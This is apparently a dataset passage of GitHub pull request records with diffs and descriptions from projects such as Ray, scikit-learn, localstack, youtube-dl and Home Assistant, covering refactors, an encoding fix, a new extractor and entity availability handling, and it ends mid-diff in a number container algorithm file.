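ids = torch.tensor([[5, 6, 7]])  # stand-in for tokenizer.encode(prompt)

add_bos_token = True  # corresponds to state['add_bos_token'] in the web UI
if add_bos_token:
    ids = torch.cat(
        [torch.tensor([[bos_token_id]]).to(ids.device), ids], dim=1
    ).to(torch.int64)

print(ids)  # tensor([[1, 5, 6, 7]])
```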
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/3954
2023-09-16T11:23:49Z
2023-09-16T12:42:39Z
2023-09-16T12:42:39Z
2023-09-16T12:44:06Z
1,044
oobabooga/text-generation-webui
26,167
Refine RegisterClientRequest message to make it clearer.
diff --git a/src/ray/common/id.cc b/src/ray/common/id.cc index 2379a22fde1ba..0735d4d0058b6 100644 --- a/src/ray/common/id.cc +++ b/src/ray/common/id.cc @@ -85,7 +85,7 @@ uint64_t MurmurHash64A(const void *key, int len, unsigned int seed) { return h; } -TaskID TaskID::GetDriverTaskID(const WorkerID &driver_id) { +TaskID TaskID::ComputeDriverTaskId(const WorkerID &driver_id) { std::string driver_id_str = driver_id.Binary(); driver_id_str.resize(Size()); return TaskID::FromBinary(driver_id_str); diff --git a/src/ray/common/id.h b/src/ray/common/id.h index 09f4a16aa660a..667e55769e65c 100644 --- a/src/ray/common/id.h +++ b/src/ray/common/id.h @@ -72,7 +72,7 @@ class TaskID : public BaseID<TaskID> { public: TaskID() : BaseID() {} static size_t Size() { return kTaskIDSize; } - static TaskID GetDriverTaskID(const WorkerID &driver_id); + static TaskID ComputeDriverTaskId(const WorkerID &driver_id); private: uint8_t id_[kTaskIDSize]; diff --git a/src/ray/raylet/format/node_manager.fbs b/src/ray/raylet/format/node_manager.fbs index aba7ab8cf6a6e..d5f5f2c7c1d9f 100644 --- a/src/ray/raylet/format/node_manager.fbs +++ b/src/ray/raylet/format/node_manager.fbs @@ -131,12 +131,11 @@ table RegisterClientRequest { // True if the client is a worker and false if the client is a driver. is_worker: bool; // The ID of the worker or driver. - client_id: string; + worker_id: string; // The process ID of this worker. worker_pid: long; - // The driver ID. This is non-nil if the client is a driver. - // TODO(qwang): rename this to driver_task_id. - driver_id: string; + // The job ID if the client is a driver, otherwise it should be NIL. + job_id: string; // Language of this worker. language: Language; } diff --git a/src/ray/raylet/node_manager.cc b/src/ray/raylet/node_manager.cc index 8e2cdf6846c62..35da34fe5207b 100644 --- a/src/ray/raylet/node_manager.cc +++ b/src/ray/raylet/node_manager.cc @@ -844,7 +844,7 @@ void NodeManager::ProcessClientMessage( void NodeManager::ProcessRegisterClientRequestMessage( const std::shared_ptr<LocalClientConnection> &client, const uint8_t *message_data) { auto message = flatbuffers::GetRoot<protocol::RegisterClientRequest>(message_data); - client->SetClientID(from_flatbuf<ClientID>(*message->client_id())); + client->SetClientID(from_flatbuf<ClientID>(*message->worker_id())); auto worker = std::make_shared<Worker>(message->worker_pid(), message->language(), client); if (message->is_worker()) { @@ -852,15 +852,12 @@ void NodeManager::ProcessRegisterClientRequestMessage( worker_pool_.RegisterWorker(std::move(worker)); DispatchTasks(local_queues_.GetReadyTasksWithResources()); } else { - // Register the new driver. Note that here the driver_id in RegisterClientRequest - // message is actually the ID of the driver task, while client_id represents the - // real driver ID, which can associate all the tasks/actors for a given driver, - // which is set to the worker ID. - // TODO(qwang): Use driver_task_id instead here. - const WorkerID driver_id = from_flatbuf<WorkerID>(*message->driver_id()); - TaskID driver_task_id = TaskID::GetDriverTaskID(driver_id); + // Register the new driver. + const WorkerID driver_id = from_flatbuf<WorkerID>(*message->worker_id()); + // Compute a dummy driver task id from a given driver. 
+ const TaskID driver_task_id = TaskID::ComputeDriverTaskId(driver_id); worker->AssignTaskId(driver_task_id); - worker->AssignJobId(from_flatbuf<JobID>(*message->client_id())); + worker->AssignJobId(from_flatbuf<JobID>(*message->job_id())); worker_pool_.RegisterDriver(std::move(worker)); local_queues_.AddDriverTaskId(driver_task_id); }
Refine `RegisterClientRequest` to make the handler in node_manager clearer.
https://api.github.com/repos/ray-project/ray/pulls/5057
2019-06-28T06:59:52Z
2019-07-02T06:26:20Z
2019-07-02T06:26:19Z
2019-07-05T23:33:55Z
1,066
ray-project/ray
19,494
Fix restore BaseNB._check_X without abstractmethod decoration
diff --git a/doc/whats_new/v0.22.rst b/doc/whats_new/v0.22.rst index e36d7e925529d..394fd6ee8203c 100644 --- a/doc/whats_new/v0.22.rst +++ b/doc/whats_new/v0.22.rst @@ -61,9 +61,10 @@ Changelog :mod:`sklearn.naive_bayes` .......................... -- |Fix| removed abstract method `_check_X` from :class:`naive_bayes.BaseNB` - that could break downstream projects inheriting from this deprecated - public base class. :pr:`15996` by :user:`Brigitta Sipőcz <bsipocz>`. +- |Fix| Removed `abstractmethod` decorator for the method `_check_X` in + :class:`naive_bayes.BaseNB` that could break downstream projects inheriting + from this deprecated public base class. :pr:`15996` by + :user:`Brigitta Sipőcz <bsipocz>`. :mod:`sklearn.semi_supervised` .............................. diff --git a/sklearn/naive_bayes.py b/sklearn/naive_bayes.py index d958645b178f6..22bd339cbd6b0 100644 --- a/sklearn/naive_bayes.py +++ b/sklearn/naive_bayes.py @@ -51,6 +51,14 @@ def _joint_log_likelihood(self, X): predict_proba and predict_log_proba. """ + def _check_X(self, X): + """To be overridden in subclasses with the actual checks.""" + # Note that this is not marked @abstractmethod as long as the + # deprecated public alias sklearn.naive_bayes.BayesNB exists + # (until 0.24) to preserve backward compat for 3rd party projects + # with existing derived classes. + return X + def predict(self, X): """ Perform classification on an array of test vectors X.
This is a follow-up on #15996 to fix the fact that this method is actually internally used by the other methods of the base class as remarked by @qinhanmin2014: https://github.com/scikit-learn/scikit-learn/pull/15996#issuecomment-569942569
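For context, a standalone sketch (not scikit-learn code) of why an `@abstractmethod` on a deprecated public base class breaks third-party subclasses that predate the method:

```python
# Illustrative only: a subclass that never overrides an abstract method can no
# longer be instantiated, which is the breakage the fix avoids.
from abc import ABCMeta, abstractmethod


class BaseWithAbstract(metaclass=ABCMeta):
    @abstractmethod
    def _check_X(self, X):
        ...


class ThirdPartyNB(BaseWithAbstract):
    pass  # written before _check_X existed, so it does not override it


try:
    ThirdPartyNB()
except TypeError as exc:
    print(exc)  # can't instantiate abstract class ThirdPartyNB ...

# The fix keeps _check_X as a plain method with a default implementation, so such
# subclasses still instantiate while predict()/predict_proba() can keep calling
# self._check_X(X) internally.
```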
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/15997
2019-12-31T15:29:36Z
2020-01-01T03:11:18Z
2020-01-01T03:11:18Z
2020-01-02T09:01:55Z
476
scikit-learn/scikit-learn
46,605
Fix encoding of non-ASCII results from API Gateway
diff --git a/localstack/services/apigateway/apigateway_listener.py b/localstack/services/apigateway/apigateway_listener.py index eaa057e69a99e..c53679e427003 100644 --- a/localstack/services/apigateway/apigateway_listener.py +++ b/localstack/services/apigateway/apigateway_listener.py @@ -9,7 +9,7 @@ from localstack.config import TEST_KINESIS_URL, TEST_SQS_URL from localstack.utils import common from localstack.utils.aws import aws_stack -from localstack.utils.common import to_str +from localstack.utils.common import to_str, to_bytes from localstack.utils.analytics import event_publisher from localstack.services.kinesis import kinesis_listener from localstack.services.awslambda import lambda_api @@ -230,9 +230,10 @@ def invoke_rest_api(api_id, stage, method, invocation_path, data, headers, path= if isinstance(parsed_result['body'], dict): response._content = json.dumps(parsed_result['body']) else: - response._content = parsed_result['body'] + response._content = to_bytes(parsed_result['body']) except Exception: response._content = '{}' + response.headers['Content-Length'] = len(response._content) return response else: msg = 'API Gateway action uri "%s" not yet implemented' % uri diff --git a/tests/integration/lambdas/lambda_integration.py b/tests/integration/lambdas/lambda_integration.py index a03f5b2849619..9505b00baafa2 100644 --- a/tests/integration/lambdas/lambda_integration.py +++ b/tests/integration/lambdas/lambda_integration.py @@ -43,10 +43,13 @@ def handler(event, context): body['requestContext'] = event.get('requestContext') body['queryStringParameters'] = event.get('queryStringParameters') body['httpMethod'] = event.get('httpMethod') + status_code = body.get('return_status_code', 200) + headers = body.get('return_headers', {}) + body = body.get('return_raw_body') or body return { 'body': body, - 'statusCode': body.get('return_status_code', 200), - 'headers': body.get('return_headers', {}) + 'statusCode': status_code, + 'headers': headers } if 'Records' not in event: diff --git a/tests/integration/test_api_gateway.py b/tests/integration/test_api_gateway.py index bb6979598defd..e3758b2c35071 100644 --- a/tests/integration/test_api_gateway.py +++ b/tests/integration/test_api_gateway.py @@ -1,3 +1,5 @@ +# -*- coding: utf-8 -*- + import base64 import re import json @@ -215,10 +217,7 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): target_uri = invocation_uri % (DEFAULT_REGION, lambda_uri) result = self.connect_api_gateway_to_http_with_lambda_proxy( - 'test_gateway2', - target_uri, - path=path - ) + 'test_gateway2', target_uri, path=path) api_id = result['id'] path_map = get_rest_api_paths(api_id) @@ -229,17 +228,11 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): path = path + '?foo=foo&bar=bar&bar=baz' url = INBOUND_GATEWAY_URL_PATTERN.format( - api_id=api_id, - stage_name=self.TEST_STAGE_NAME, - path=path - ) + api_id=api_id, stage_name=self.TEST_STAGE_NAME, path=path) data = {'return_status_code': 203, 'return_headers': {'foo': 'bar123'}} - result = requests.post( - url, - data=json.dumps(data), - headers={'User-Agent': 'python-requests/testing'} - ) + result = requests.post(url, data=json.dumps(data), + headers={'User-Agent': 'python-requests/testing'}) self.assertEqual(result.status_code, 203) self.assertEqual(result.headers.get('foo'), 'bar123') @@ -263,6 +256,11 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): result = requests.delete(url, data=json.dumps(data)) self.assertEqual(result.status_code, 404) + # 
send message with non-ASCII chars + body_msg = '🙀 - 参よ' + result = requests.post(url, data=json.dumps({'return_raw_body': body_msg})) + self.assertEqual(to_str(result.content), body_msg) + def test_api_gateway_lambda_proxy_integration_any_method(self): self._test_api_gateway_lambda_proxy_integration_any_method( self.TEST_LAMBDA_PROXY_BACKEND_ANY_METHOD, @@ -281,19 +279,12 @@ def _test_api_gateway_lambda_proxy_integration_any_method(self, fn_name, path): target_uri = aws_stack.apigateway_invocations_arn(lambda_uri) result = self.connect_api_gateway_to_http_with_lambda_proxy( - 'test_gateway3', - target_uri, - methods=['ANY'], - path=path - ) + 'test_gateway3', target_uri, methods=['ANY'], path=path) # make test request to gateway and check response path = path.replace('{test_param1}', 'foo1') url = INBOUND_GATEWAY_URL_PATTERN.format( - api_id=result['id'], - stage_name=self.TEST_STAGE_NAME, - path=path - ) + api_id=result['id'], stage_name=self.TEST_STAGE_NAME, path=path) data = {} for method in ('GET', 'POST', 'PUT', 'PATCH', 'DELETE', 'OPTIONS'): @@ -379,7 +370,6 @@ def create_lambda_function(self, fn_name): libs=TEST_LAMBDA_LIBS, runtime=LAMBDA_RUNTIME_PYTHON27 ) - testutil.create_lambda_function( func_name=fn_name, zip_file=zip_file,
Fix encoding of non-ASCII results from API Gateway
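A short illustration of why the body has to be converted to bytes and `Content-Length` computed from the byte length; the sample string is taken from the new integration test, and `to_bytes` is assumed to be a plain UTF-8 encode:

```python
# For non-ASCII payloads the character count and the byte count differ, so the
# response content must be bytes and Content-Length must use the byte length.
body_msg = '🙀 - 参よ'   # string from the new test case

encoded = body_msg.encode('utf-8')   # what to_bytes() is assumed to do
print(len(body_msg))  # 6 characters
print(len(encoded))   # 13 bytes -- the value Content-Length must report
```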
https://api.github.com/repos/localstack/localstack/pulls/1715
2019-11-02T21:00:25Z
2019-11-02T22:16:27Z
2019-11-02T22:16:27Z
2019-11-02T22:16:32Z
1,341
localstack/localstack
28,555
[RTBFVideo] Add new extractor
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py index e389acc6abe..a8fef270302 100644 --- a/youtube_dl/extractor/__init__.py +++ b/youtube_dl/extractor/__init__.py @@ -210,6 +210,7 @@ from .ro220 import Ro220IE from .rottentomatoes import RottenTomatoesIE from .roxwel import RoxwelIE +from .rtbf import RTBFVideoIE from .rtlnow import RTLnowIE from .rts import RTSIE from .rtve import RTVEALaCartaIE diff --git a/youtube_dl/extractor/rtbf.py b/youtube_dl/extractor/rtbf.py new file mode 100644 index 00000000000..54453966556 --- /dev/null +++ b/youtube_dl/extractor/rtbf.py @@ -0,0 +1,48 @@ +# coding: utf-8 +from __future__ import unicode_literals + +import re +import json + +from .common import InfoExtractor +from ..utils import clean_html + +class RTBFVideoIE(InfoExtractor): + _VALID_URL = r'https?://www.rtbf.be/video/(?P<title>[^?]+)\?.*id=(?P<id>[0-9]+)' + _TEST = { + 'url': 'https://www.rtbf.be/video/detail_les-diables-au-coeur-episode-2?id=1921274', + 'md5': '799f334ddf2c0a582ba80c44655be570', + 'info_dict': { + 'id': '1921274', + 'ext': 'mp4', + 'title': 'Les Diables au coeur (épisode 2)', + 'duration': 3099, + } + } + + def _real_extract(self, url): + mobj = re.match(self._VALID_URL, url) + video_id = mobj.group('id') + + # TODO more code goes here, for example ... + webpage = self._download_webpage(url, video_id) + title = self._html_search_regex( + r'<meta property="og:description" content="([^"]*)"', + webpage, 'title', mobj.group('title')) + + iframe_url = self._html_search_regex(r'<iframe [^>]*src="([^"]+)"', + webpage, 'iframe') + iframe = self._download_webpage(iframe_url, video_id) + + data_video_idx = iframe.find('data-video') + next_data_idx = iframe.find('data-', data_video_idx + 1) + json_data_start = data_video_idx + len('data-video=') + 1 + json_data_end = next_data_idx - 2 + video_data = json.loads(clean_html(iframe[json_data_start:json_data_end])) + + return { + 'id': video_id, + 'title': title, + 'url': video_data['data']['downloadUrl'], + 'duration': video_data['data']['duration'], + }
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/2822
2014-04-28T18:33:48Z
2014-04-29T12:43:47Z
2014-04-29T12:43:47Z
2014-04-29T12:44:25Z
718
ytdl-org/youtube-dl
50,317
[pre-commit.ci] pre-commit autoupdate
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 6dafd1980e..4531f0b4ef 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -15,7 +15,7 @@ repos: files: "^(?!examples/)" args: ["--application-directories", "src"] - repo: https://github.com/psf/black - rev: 23.1.0 + rev: 23.3.0 hooks: - id: black - repo: https://github.com/PyCQA/flake8
<!--pre-commit.ci start--> updates: - [github.com/psf/black: 23.1.0 → 23.3.0](https://github.com/psf/black/compare/23.1.0...23.3.0) <!--pre-commit.ci end-->
https://api.github.com/repos/pallets/flask/pulls/5041
2023-04-04T06:31:31Z
2023-04-04T14:00:50Z
2023-04-04T14:00:50Z
2023-04-19T00:05:29Z
146
pallets/flask
20,029
Set nest entities as unavailable on lost connection
diff --git a/homeassistant/components/nest/climate_sdm.py b/homeassistant/components/nest/climate_sdm.py index e40db60d5eddab..3113cb2dd40201 100644 --- a/homeassistant/components/nest/climate_sdm.py +++ b/homeassistant/components/nest/climate_sdm.py @@ -117,6 +117,11 @@ def device_info(self) -> DeviceInfo: """Return device specific attributes.""" return self._device_info.device_info + @property + def available(self) -> bool: + """Return device availability.""" + return self._device_info.available + async def async_added_to_hass(self) -> None: """Run when entity is added to register update signal handler.""" self._attr_supported_features = self._get_supported_features() diff --git a/homeassistant/components/nest/const.py b/homeassistant/components/nest/const.py index 64c27c1643be78..853e778977d35a 100644 --- a/homeassistant/components/nest/const.py +++ b/homeassistant/components/nest/const.py @@ -14,6 +14,8 @@ CONF_SUBSCRIBER_ID_IMPORTED = "subscriber_id_imported" CONF_CLOUD_PROJECT_ID = "cloud_project_id" +CONNECTIVITY_TRAIT_OFFLINE = "OFFLINE" + SIGNAL_NEST_UPDATE = "nest_update" # For the Google Nest Device Access API diff --git a/homeassistant/components/nest/device_info.py b/homeassistant/components/nest/device_info.py index 2d2b01d3849255..e269b76fcc4be5 100644 --- a/homeassistant/components/nest/device_info.py +++ b/homeassistant/components/nest/device_info.py @@ -5,13 +5,13 @@ from collections.abc import Mapping from google_nest_sdm.device import Device -from google_nest_sdm.device_traits import InfoTrait +from google_nest_sdm.device_traits import ConnectivityTrait, InfoTrait from homeassistant.core import HomeAssistant, callback from homeassistant.helpers import device_registry as dr from homeassistant.helpers.entity import DeviceInfo -from .const import DATA_DEVICE_MANAGER, DOMAIN +from .const import CONNECTIVITY_TRAIT_OFFLINE, DATA_DEVICE_MANAGER, DOMAIN DEVICE_TYPE_MAP: dict[str, str] = { "sdm.devices.types.CAMERA": "Camera", @@ -30,6 +30,15 @@ def __init__(self, device: Device) -> None: """Initialize the DeviceInfo.""" self._device = device + @property + def available(self) -> bool: + """Return device availability.""" + if ConnectivityTrait.NAME in self._device.traits: + trait: ConnectivityTrait = self._device.traits[ConnectivityTrait.NAME] + if trait.status == CONNECTIVITY_TRAIT_OFFLINE: + return False + return True + @property def device_info(self) -> DeviceInfo: """Return device specific attributes.""" diff --git a/homeassistant/components/nest/sensor_sdm.py b/homeassistant/components/nest/sensor_sdm.py index 11edc9f3506fc3..b36e91031960ff 100644 --- a/homeassistant/components/nest/sensor_sdm.py +++ b/homeassistant/components/nest/sensor_sdm.py @@ -62,6 +62,11 @@ def __init__(self, device: Device) -> None: self._attr_unique_id = f"{device.name}-{self.device_class}" self._attr_device_info = self._device_info.device_info + @property + def available(self) -> bool: + """Return the device availability.""" + return self._device_info.available + async def async_added_to_hass(self) -> None: """Run when entity is added to register update signal handler.""" self.async_on_remove( diff --git a/tests/components/nest/test_climate_sdm.py b/tests/components/nest/test_climate_sdm.py index 440855f6ab7782..4ac58171fcdcd7 100644 --- a/tests/components/nest/test_climate_sdm.py +++ b/tests/components/nest/test_climate_sdm.py @@ -34,7 +34,11 @@ HVACAction, HVACMode, ) -from homeassistant.const import ATTR_SUPPORTED_FEATURES, ATTR_TEMPERATURE +from homeassistant.const import ( + 
ATTR_SUPPORTED_FEATURES, + ATTR_TEMPERATURE, + STATE_UNAVAILABLE, +) from homeassistant.core import HomeAssistant from homeassistant.exceptions import HomeAssistantError @@ -1442,3 +1446,63 @@ async def test_thermostat_hvac_mode_failure( with pytest.raises(HomeAssistantError): await common.async_set_preset_mode(hass, PRESET_ECO) await hass.async_block_till_done() + + +async def test_thermostat_available( + hass: HomeAssistant, setup_platform: PlatformSetup, create_device: CreateDevice +): + """Test a thermostat that is available.""" + create_device.create( + { + "sdm.devices.traits.ThermostatHvac": { + "status": "COOLING", + }, + "sdm.devices.traits.ThermostatMode": { + "availableModes": ["HEAT", "COOL", "HEATCOOL", "OFF"], + "mode": "COOL", + }, + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 29.9, + }, + "sdm.devices.traits.ThermostatTemperatureSetpoint": { + "coolCelsius": 28.0, + }, + "sdm.devices.traits.Connectivity": {"status": "ONLINE"}, + }, + ) + await setup_platform() + + assert len(hass.states.async_all()) == 1 + thermostat = hass.states.get("climate.my_thermostat") + assert thermostat is not None + assert thermostat.state == HVACMode.COOL + + +async def test_thermostat_unavailable( + hass: HomeAssistant, setup_platform: PlatformSetup, create_device: CreateDevice +): + """Test a thermostat that is unavailable.""" + create_device.create( + { + "sdm.devices.traits.ThermostatHvac": { + "status": "COOLING", + }, + "sdm.devices.traits.ThermostatMode": { + "availableModes": ["HEAT", "COOL", "HEATCOOL", "OFF"], + "mode": "COOL", + }, + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 29.9, + }, + "sdm.devices.traits.ThermostatTemperatureSetpoint": { + "coolCelsius": 28.0, + }, + "sdm.devices.traits.Connectivity": {"status": "OFFLINE"}, + }, + ) + await setup_platform() + + assert len(hass.states.async_all()) == 1 + thermostat = hass.states.get("climate.my_thermostat") + assert thermostat is not None + assert thermostat.state == STATE_UNAVAILABLE diff --git a/tests/components/nest/test_sensor_sdm.py b/tests/components/nest/test_sensor_sdm.py index d1a89317959d69..c3698cf4123c6b 100644 --- a/tests/components/nest/test_sensor_sdm.py +++ b/tests/components/nest/test_sensor_sdm.py @@ -20,6 +20,7 @@ ATTR_FRIENDLY_NAME, ATTR_UNIT_OF_MEASUREMENT, PERCENTAGE, + STATE_UNAVAILABLE, TEMP_CELSIUS, ) from homeassistant.core import HomeAssistant @@ -90,6 +91,58 @@ async def test_thermostat_device( assert device.identifiers == {("nest", DEVICE_ID)} +async def test_thermostat_device_available( + hass: HomeAssistant, create_device: CreateDevice, setup_platform: PlatformSetup +): + """Test a thermostat with temperature and humidity sensors that is Online.""" + create_device.create( + { + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 25.1, + }, + "sdm.devices.traits.Humidity": { + "ambientHumidityPercent": 35.0, + }, + "sdm.devices.traits.Connectivity": {"status": "ONLINE"}, + } + ) + await setup_platform() + + temperature = hass.states.get("sensor.my_sensor_temperature") + assert temperature is not None + assert temperature.state == "25.1" + + humidity = hass.states.get("sensor.my_sensor_humidity") + assert humidity is not None + assert humidity.state == "35" + + +async def test_thermostat_device_unavailable( + hass: HomeAssistant, create_device: CreateDevice, setup_platform: PlatformSetup +): + """Test a thermostat with temperature and humidity sensors that is Offline.""" + create_device.create( + { + "sdm.devices.traits.Temperature": { + 
"ambientTemperatureCelsius": 25.1, + }, + "sdm.devices.traits.Humidity": { + "ambientHumidityPercent": 35.0, + }, + "sdm.devices.traits.Connectivity": {"status": "OFFLINE"}, + } + ) + await setup_platform() + + temperature = hass.states.get("sensor.my_sensor_temperature") + assert temperature is not None + assert temperature.state == STATE_UNAVAILABLE + + humidity = hass.states.get("sensor.my_sensor_humidity") + assert humidity is not None + assert humidity.state == STATE_UNAVAILABLE + + async def test_no_devices(hass: HomeAssistant, setup_platform: PlatformSetup): """Test no devices returned by the api.""" await setup_platform()
Update Climate and Sensor entities to be unavailable when the device connectivity trait indicates the device is offline. The prior behavior, the last known values would be displayed indefinitely if the device lost internet connectivity. This was creating the illusion that the device was still connected. With this change, the Home Assistant entities will become unavailable when the device loses connectivity. <!-- You are amazing! Thanks for contributing to our project! Please, DO NOT DELETE ANY TEXT from this template! (unless instructed). --> ## Breaking change <!-- If your PR contains a breaking change for existing users, it is important to tell them what breaks, how to make it work again and why we did this. This piece of text is published with the release notes, so it helps if you write it towards our users, not us. Note: Remove this section if this PR is NOT a breaking change. --> ## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [x] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Deprecation (breaking change to happen in the future) - [ ] Breaking change (fix/feature causing existing functionality to break) - [ ] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: #70479 - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [x] Local tests pass. **Your PR cannot be merged unless tests pass** - [x] There is no commented out code in this PR. - [x] I have followed the [development checklist][dev-checklist] - [x] The code has been formatted using Black (`black --fast homeassistant tests`) - [x] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. 
The integration reached or maintains the following [Integration Quality Scale][quality-scale]: <!-- The Integration Quality Scale scores an integration on the code quality and user experience. Each level of the quality scale consists of a list of requirements. We highly recommend getting your integration scored! --> - [ ] No score or internal - [ ] 🥈 Silver - [ ] 🥇 Gold - [ ] 🏆 Platinum <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html [manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html [quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html [docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/78773
2022-09-19T13:47:43Z
2022-09-29T02:23:11Z
2022-09-29T02:23:11Z
2022-09-30T02:58:32Z
2,184
home-assistant/core
38,732
Switched diabetes and covid APIs
diff --git a/README.md b/README.md index caec26f02d..789393be52 100644 --- a/README.md +++ b/README.md @@ -523,8 +523,8 @@ API | Description | Auth | HTTPS | CORS | API | Description | Auth | HTTPS | CORS | |---|---|---|---|---| | [BetterDoctor](https://developer.betterdoctor.com/) | Detailed information about doctors in your area | `apiKey` | Yes | Unknown | -| [Diabetes](http://predictbgl.com/api/) | Logging and retrieving diabetes information | No | No | Unknown | | [Covid-19](https://covid19api.com/) | Covid 19 spread, infection and recovery | No | Yes | Yes | +| [Diabetes](http://predictbgl.com/api/) | Logging and retrieving diabetes information | No | No | Unknown | | [Flutrack](http://www.flutrack.org/) | Influenza-like symptoms with geotracking | No | No | Unknown | | [Healthcare.gov](https://www.healthcare.gov/developers/) | Educational content about the US Health Insurance Marketplace | No | Yes | Unknown | | [Lexigram](https://docs.lexigram.io/v1/welcome) | NLP that extracts mentions of clinical concepts from text, gives access to clinical ontology | `apiKey` | Yes | Unknown |
Thank you for taking the time to work on a Pull Request for this project! To ensure your PR is dealt with swiftly please check the following: - [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md) - [x] **Your additions are ordered alphabetically** - I used a proper alphabet this time. - [x] Your submission has a useful description - [x] The description does not end with punctuation - [x] Each table column should be padded with one space on either side - [x] You have searched the repository for any relevant issues or pull requests - [x] Any category you are creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/1192
2020-03-17T08:57:18Z
2020-03-17T09:00:04Z
2020-03-17T09:00:03Z
2020-08-03T16:50:01Z
300
public-apis/public-apis
35,629
Create number container system algorithm
diff --git a/DIRECTORY.md b/DIRECTORY.md index 231b0e2f1d2f..6dac4a9a5783 100644 --- a/DIRECTORY.md +++ b/DIRECTORY.md @@ -419,8 +419,9 @@ * [Frequent Pattern Graph Miner](graphs/frequent_pattern_graph_miner.py) * [G Topological Sort](graphs/g_topological_sort.py) * [Gale Shapley Bigraph](graphs/gale_shapley_bigraph.py) + * [Graph Adjacency List](graphs/graph_adjacency_list.py) + * [Graph Adjacency Matrix](graphs/graph_adjacency_matrix.py) * [Graph List](graphs/graph_list.py) - * [Graph Matrix](graphs/graph_matrix.py) * [Graphs Floyd Warshall](graphs/graphs_floyd_warshall.py) * [Greedy Best First](graphs/greedy_best_first.py) * [Greedy Min Vertex Cover](graphs/greedy_min_vertex_cover.py) @@ -479,6 +480,7 @@ * [Lib](linear_algebra/src/lib.py) * [Polynom For Points](linear_algebra/src/polynom_for_points.py) * [Power Iteration](linear_algebra/src/power_iteration.py) + * [Rank Of Matrix](linear_algebra/src/rank_of_matrix.py) * [Rayleigh Quotient](linear_algebra/src/rayleigh_quotient.py) * [Schur Complement](linear_algebra/src/schur_complement.py) * [Test Linear Algebra](linear_algebra/src/test_linear_algebra.py) @@ -651,6 +653,7 @@ * [Sigmoid Linear Unit](maths/sigmoid_linear_unit.py) * [Signum](maths/signum.py) * [Simpson Rule](maths/simpson_rule.py) + * [Simultaneous Linear Equation Solver](maths/simultaneous_linear_equation_solver.py) * [Sin](maths/sin.py) * [Sock Merchant](maths/sock_merchant.py) * [Softmax](maths/softmax.py) @@ -726,6 +729,7 @@ * [Maximum Subarray](other/maximum_subarray.py) * [Maximum Subsequence](other/maximum_subsequence.py) * [Nested Brackets](other/nested_brackets.py) + * [Number Container System](other/number_container_system.py) * [Password](other/password.py) * [Quine](other/quine.py) * [Scoring Algorithm](other/scoring_algorithm.py) diff --git a/other/number_container_system.py b/other/number_container_system.py new file mode 100644 index 000000000000..f547bc8a229e --- /dev/null +++ b/other/number_container_system.py @@ -0,0 +1,180 @@ +""" +A number container system that uses binary search to delete and insert values into +arrays with O(n logn) write times and O(1) read times. + +This container system holds integers at indexes. + +Further explained in this leetcode problem +> https://leetcode.com/problems/minimum-cost-tree-from-leaf-values +""" + + +class NumberContainer: + def __init__(self) -> None: + # numbermap keys are the number and its values are lists of indexes sorted + # in ascending order + self.numbermap: dict[int, list[int]] = {} + # indexmap keys are an index and it's values are the number at that index + self.indexmap: dict[int, int] = {} + + def binary_search_delete(self, array: list | str | range, item: int) -> list[int]: + """ + Removes the item from the sorted array and returns + the new array. + + >>> NumberContainer().binary_search_delete([1,2,3], 2) + [1, 3] + >>> NumberContainer().binary_search_delete([0, 0, 0], 0) + [0, 0] + 